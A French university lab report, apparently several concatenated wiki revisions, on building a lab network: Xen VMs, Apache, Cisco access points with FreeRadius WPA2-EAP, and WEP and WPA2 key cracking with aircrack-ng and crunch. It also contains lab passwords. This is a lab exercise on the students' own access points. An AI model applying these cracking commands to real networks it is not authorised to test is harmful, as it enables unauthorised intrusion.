Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T11:17:30Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T11:15:05Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T11:09:55Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

